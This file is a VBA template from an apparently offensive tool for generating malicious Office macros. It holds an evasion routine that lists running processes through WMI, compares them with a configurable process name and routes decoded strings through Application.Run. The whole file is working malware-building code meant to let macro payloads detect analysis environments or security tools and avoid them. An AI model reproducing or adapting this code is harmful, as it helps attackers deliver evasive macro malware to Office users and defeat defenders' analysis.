MaliciousMacroGenerator/templates/evasions/process.vba

37 lines
1.5 KiB
Plaintext

[use:func_evasion_process_wrapper]
[use:func_evasion_process]
[use:func_evasion_get_process]
Function func_evasion_process() As String
Dim func_evasion_process1 As String
Dim func_evasion_process2 As Object
Dim func_evasion_process3 As Object
Dim func_evasion_process = "bool1"
Set func_evasion_process2 = GetObject(decode("{[winmgmts:\\.\root\cimv2]}"))
Set func_evasion_process3 = func_evasion_process2.ExecQuery(decode("{[SELECT Name FROM Win32_Process]}"))
func_evasion_process1 = "data1"
func_evasion_process1 = func_evasion_get_process()
For Each func_evasion_process4 In func_evasion_process3
If LCase(func_evasion_process4.Name) = func_evasion_process1 Then
func_evasion_process = "bool2"
End If
Next
End Function
Function func_evasion_get_process() As String
Dim func_evasion_get_process1 As String
Dim func_evasion_get_process2 As String
Dim func_evasion_get_process3 As Integer
func_evasion_get_process3 = [int100]
func_evasion_get_process1 = "[PROCESS_NAME]"
func_evasion_get_process2 = "decode"
func_evasion_get_process = func_evasion_process_wrapper(func_evasion_get_process2, func_evasion_get_process1, func_evasion_get_process3)
End Function
Function func_evasion_process_wrapper(func_evasion_process_wrapper1 As String, func_evasion_process_wrapper2 As String, func_evasion_process_wrapper3 As Integer) As String
If (func_evasion_process_wrapper3 > 1) Then
func_evasion_process_wrapper = Application.Run(func_evasion_process_wrapper1, func_evasion_process_wrapper2)
End If
End Function